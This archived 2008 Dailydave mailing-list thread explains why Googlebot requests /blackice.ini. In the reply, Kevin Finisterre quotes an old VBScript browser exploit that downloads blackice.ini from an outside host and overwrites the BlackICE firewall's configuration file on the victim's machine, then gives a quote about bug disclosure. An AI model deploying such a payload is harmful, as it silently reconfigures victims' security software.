Dailydave mailing list archives
Re: Google Robot and Black ICE
From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com>
Date: Thu, 21 Feb 2008 00:34:55 -0500
My friend have you forgotten our old Black Ice exploit? God... I had to search my spool for the lulz as they say.
<script language="vbscript"> const adTypeBinary = 1 const adSaveCreateOverwrite = 2 const adModeReadWrite = 3 set xmlHTTP = CreateObject("Microsoft.XMLHTTP") xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false xmlHTTP.send contents = xmlHTTP.responseBody Set oStr = CreateObject("ADODB.Stream") oStr.Mode = adModeReadWrite oStr.Type = adTypeBinary oStr.Open oStr.Write(contents)oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
</script> maybe this will refresh your memory: "I would like to see a panel discussion about the disclosure of lame bugs; I am probably going to submit a white paper on it to an upcoming conference. We do not get too concerned about local Window's BO, unless they are in IE, Outlook, etc that would allow for a network vector for compromise. On a system that is more commonly deployed as a multi-user system (unix,linux), of course we consider a local priv escalation serious and provide protection in our host based products. We have about 15,000 corporate customers, including most of the fortune 1000, and in my six years at ISS not a single one has asked me for our products to detect or stop a local windows BO (besides IE or Outlook). I am responsible for every signature in all our products." can you name that quote? heh -KF On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:
Greetings,I was just looking over some IDS events and noticed that Google keeps looking for blackice.ini on one of our web servers. Does anyone have any idea as to why Google would be doing this? This happens on average 3-5 times a day. Nothing critical, just curious. Every time Google tries the request is denied.Event: ------ Blocked access to : /blackice.ini Reason : URL file extension is restricted by policy SOURCE IP : crawl-66-249-73-113.googlebot.com Detected On : Web Server Logs, NIDS, Firewall Logs -- Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 Join the Netragard, LLC. Linked In Group: http://www.linkedin.com/e/gis/48683/0B98E1705142 --------------------------------------------------------------- Netragard, LLC - http://www.netragard.com - "We make IT Safe" Penetration Testing, Vulnerability Assessments, Website Security <adriel.vcf>_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Google Robot and Black ICE Adriel Desautels (Feb 20)
- Re: Google Robot and Black ICE Kevin Finisterre (lists) (Feb 21)
- Re: Google Robot and Black ICE Chris Kuethe (Feb 21)